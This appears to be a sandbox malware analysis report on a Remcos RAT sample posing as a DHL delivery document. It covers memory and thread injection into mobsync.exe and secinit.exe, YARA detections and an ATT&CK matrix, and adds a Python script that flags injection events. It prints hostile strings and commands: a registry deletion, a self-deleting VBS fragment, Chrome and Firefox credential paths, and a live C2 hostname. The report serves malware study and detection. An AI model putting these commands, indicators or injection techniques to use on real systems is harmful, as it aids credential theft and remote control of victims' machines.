Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 2F70000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 3200000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 3210000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 3220000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 3230000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 3240000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 3250000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 3260000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 3270000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 50600000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 3280000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 3290000
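Two injectors appear in the rows above, the original sample and its dropped copy Iqzenco.exe, each writing a run of 64 KiB-aligned regions into mobsync.exe and secinit.exe. One base, 50600000, recurs in every target and is also where the unpacked Remcos PE matched by YARA earlier in the report sits (the 50601a02 unpack entries), which makes it the most useful pivot in this block. The Python below is an added example, not code from the report or from Remcos; it parses a constructed subset of the "Memory written" rows above together with a few of the "Memory allocated" rows that follow, pairs executable allocations with writes to the same base in the same target, and lists bases written into more than one target process. The report rows carry no timestamps, so pairing by base address alone is this example's assumption, and the subset only includes allocation rows for the first injector.

```python
import re
from collections import defaultdict

# Constructed input: a subset of the "Memory allocated" and "Memory written" rows
# from the report, source column and event column separated by " | ".
REPORT_ROWS = r"""
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 50600000 protect: page execute and read and write
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2C60000 protect: page execute and read and write
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2C60000
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 50600000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D30000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 50600000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 2F50000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 50600000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 3290000
""".strip().splitlines()

ROW_RE = re.compile(
    r"^Source:\s*(?P<src>.*?)\s*\|\s*Memory (?P<op>allocated|written):\s*"
    r"(?P<target>.*?\.exe)\s+base:\s*(?P<base>[0-9A-Fa-f]+)"
    r"(?:\s+protect:\s*(?P<protect>.*))?$"
)


def parse_rows(rows):
    """Turn report rows into dicts with the base parsed as an integer."""
    events = []
    for row in rows:
        m = ROW_RE.match(row)
        if m:
            events.append({
                "src": m.group("src"),
                "op": m.group("op"),
                "target": m.group("target"),
                "base": int(m.group("base"), 16),
                "protect": (m.group("protect") or "").lower(),
            })
    return events


def summarise(events):
    """Group by (injector, target): bases written, bases allocated executable,
    and the intersection, i.e. executable allocations that were then written."""
    pairs = defaultdict(lambda: {"written": set(), "rwx_alloc": set()})
    for e in events:
        bucket = pairs[(e["src"], e["target"])]
        if e["op"] == "written":
            bucket["written"].add(e["base"])
        elif "execute" in e["protect"]:
            bucket["rwx_alloc"].add(e["base"])
    return {
        key: {
            "written": sorted(b["written"]),
            "rwx_alloc": sorted(b["rwx_alloc"]),
            "rwx_then_written": sorted(b["written"] & b["rwx_alloc"]),
        }
        for key, b in pairs.items()
    }


def flag_injection(report):
    """(injector, target) pairs with an executable allocation that was written to:
    the allocate-then-write half of a classic remote injection sequence."""
    return sorted(key for key, b in report.items() if b["rwx_then_written"])


def shared_bases(report):
    """Bases written into more than one target process. A fixed address reused
    across targets usually means the payload has a preferred load address."""
    seen = defaultdict(set)
    for (_, target), b in report.items():
        for base in b["written"]:
            seen[base].add(target)
    return {base: sorted(targets) for base, targets in seen.items() if len(targets) > 1}


if __name__ == "__main__":
    rep = summarise(parse_rows(REPORT_ROWS))
    for (src, target), b in rep.items():
        print(f"{src} -> {target}: {len(b['written'])} regions written, "
              f"RWX then written at {[hex(x) for x in b['rwx_then_written']]}")
    for base, targets in shared_bases(rep).items():
        print(f"base {base:#x} written into {len(targets)} targets: {targets}")
```

On this subset the sample-to-mobsync pair is flagged (both 0x2C60000 and 0x50600000 were allocated executable and then written), and 0x50600000 is the only base shared between mobsync.exe and secinit.exe. With full endpoint telemetry the same grouping would be keyed on process IDs rather than image paths, since the report lists mobsync.exe twice as a target (once per injector).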
Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 50600000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2C60000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2C70000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2C80000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D10000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D20000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D30000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D40000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D50000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D60000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D70000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D80000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D90000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2DA0000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 50600000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D30000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D40000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D50000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2DE0000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2DF0000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3000000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3010000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3020000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3030000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3040000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3050000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3060000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3070000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 50600000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 2F50000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 2F60000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 2F70000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3200000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3210000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3220000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3230000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3240000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3250000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3260000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3270000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3280000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3290000 protect: page execute and read and write
Creates a thread in another existing process (thread injection)
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 2C80000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 2D40000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 2D80000
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 2DA0000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 2D50000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 3010000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 3050000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 3070000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeThread created: C:\Windows\SysWOW64\secinit.exe EIP: 2F70000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeThread created: C:\Windows\SysWOW64\secinit.exe EIP: 3230000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeThread created: C:\Windows\SysWOW64\secinit.exe EIP: 3270000
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeThread created: C:\Windows\SysWOW64\secinit.exe EIP: 3290000
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeProcess created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeProcess created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeProcess created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_00414923 StrToIntA,mouse_event,
              Source: mobsync.exe, 00000005.00000000.720932112.00000000035A0000.00000002.00020000.sdmp, mobsync.exe, 00000016.00000000.816684928.00000000038C0000.00000002.00020000.sdmpBinary or memory string: Program Manager
              Source: mobsync.exe, 00000005.00000000.720932112.00000000035A0000.00000002.00020000.sdmp, mobsync.exe, 00000016.00000000.816684928.00000000038C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
              Source: mobsync.exe, 00000005.00000000.720932112.00000000035A0000.00000002.00020000.sdmp, mobsync.exe, 00000016.00000000.816684928.00000000038C0000.00000002.00020000.sdmpBinary or memory string: Progman
              Source: mobsync.exe, 00000005.00000000.720932112.00000000035A0000.00000002.00020000.sdmp, mobsync.exe, 00000016.00000000.816684928.00000000038C0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoA,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0042F2AB cpuid
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_004410D3 GetSystemTimeAsFileTime,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0044190C _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_004166F6 GetComputerNameExW,GetUserNameW,

              Stealing of Sensitive Information:

Yara detected Remcos RAT
              Source: Yara matchFile source: 22.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.938674908.0000000002EA7000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.827146573.0000000003178000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.939914286.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.827407780.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.851109980.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.850918949.0000000003327000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 1368, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 4108, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: secinit.exe PID: 6644, type: MEMORYSTR
Contains functionality to steal Firefox passwords or cookies
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: \key3.db
Contains functionality to steal Chrome passwords or cookies
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

              Remote Access Functionality:

Yara detected Remcos RAT (same Yara matches as listed under Stealing of Sensitive Information)
Detected Remcos RAT
              Source: mobsync.exeString found in binary or memory: Remcos_Mutex_Inj
              Source: mobsync.exe, 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicence_code.txtSoftware\WDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\SETTINGSoverridepth_unenc3.1.5 Prov|
              Source: mobsync.exeString found in binary or memory: Remcos_Mutex_Inj
              Source: mobsync.exe, 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicence_code.txtSoftware\WDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\SETTINGSoverridepth_unenc3.1.5 Prov|
              Source: secinit.exe, 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
              Source: secinit.exe, 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicence_code.txtSoftware\WDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\SETTINGSoverridepth_unenc3.1.5 Prov|
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: cmd.exe

              Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting [1] | Application Shimming [1] | Application Shimming [1] | Deobfuscate/Decode Files or Information [1] | OS Credential Dumping [1] | System Time Discovery [2] | Remote Services | Archive Collected Data [11] | Exfiltration Over Other Network Medium | Ingress Tool Transfer [1] | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot [1]
Default Accounts | Native API [1] | Registry Run Keys / Startup Folder [1] | Access Token Manipulation [1] | Scripting [1] | Input Capture [11] | Account Discovery [1] | Remote Desktop Protocol | Input Capture [11] | Exfiltration Over Bluetooth | Encrypted Channel [1] | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Command and Scripting Interpreter [1] | Logon Script (Windows) | Process Injection [322] | Obfuscated Files or Information [2] | Credentials In Files [2] | File and Directory Discovery [2] | SMB/Windows Admin Shares | Clipboard Data [2] | Automated Exfiltration | Non-Standard Port [1] | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder [1] | Masquerading [11] | NTDS | System Information Discovery [33] | Distributed Component Object Model | Input Capture | Scheduled Transfer | Remote Access Software [1] | SIM Card Swap | Carrier Billing Fraud | -
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Modify Registry [1] | LSA Secrets | Query Registry [1] | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol [1] | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | -
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion [21] | Cached Domain Credentials | Security Software Discovery [12] | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol [21] | Jamming or Denial of Service | Abuse Accessibility Features | -
External Remote Services | Scheduled Task | Startup Items | Startup Items | Access Token Manipulation [1] | DCSync | Virtualization/Sandbox Evasion [21] | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection [322] | Proc Filesystem | Process Discovery [2] | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | - | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Owner/User Discovery [1] | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | - | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | Remote System Discovery [1] | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | - | - | Data Encrypted for Impact

              Behavior Graph

Behavior Graph ID: 491719; Sample: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe; Start date: 27/09/2021; Architecture: WINDOWS; Score: 100

Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Icon mismatch, binary includes an icon from a different legit application in order to fool users; 6 other signatures. Contacted host at top level: ongod4ever.ddns.net.

Process tree recovered from the graph:

• ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe: contacts sn-files.fe.1drv.com, onedrive.live.com and bl30uw.sn.files.1drv.com; drops C:\Users\Public\Libraries\...\Iqzenco.exe (PE32); signatures: Writes to foreign memory regions, Allocates memory in foreign processes, Creates a thread in another existing process (thread injection); starts mobsync.exe and two cmd.exe instances
• mobsync.exe (started by the sample): contacts ongod4ever.ddns.net (185.140.53.15, ports 49771, 49774, 49775, DAVID_CRAIGGG, Sweden) and 192.168.2.1; signatures: Contains functionality to steal Chrome passwords or cookies, Contains functionality to steal Firefox passwords or cookies, Delayed program exit found
• cmd.exe (first instance): starts reg.exe and conhost.exe; reg.exe starts conhost.exe
• cmd.exe (second instance): starts cmd.exe and conhost.exe; the child cmd.exe starts conhost.exe
• Iqzenco.exe (first instance): contacts sn-files.fe.1drv.com and 2 other IPs or domains; signature: Multi AV Scanner detection for dropped file; starts mobsync.exe
• Iqzenco.exe (second instance): contacts sn-files.fe.1drv.com and 2 other IPs or domains; starts secinit.exe


              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

Source | Detection | Scanner | Label
ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | 26% | Virustotal | -
ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | 24% | ReversingLabs | Win32.Backdoor.Remcos

              Dropped Files

Source | Detection | Scanner | Label
C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | 24% | ReversingLabs | Win32.Backdoor.Remcos

              Unpacked PE Files

Source | Detection | Scanner | Label
0.0.ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
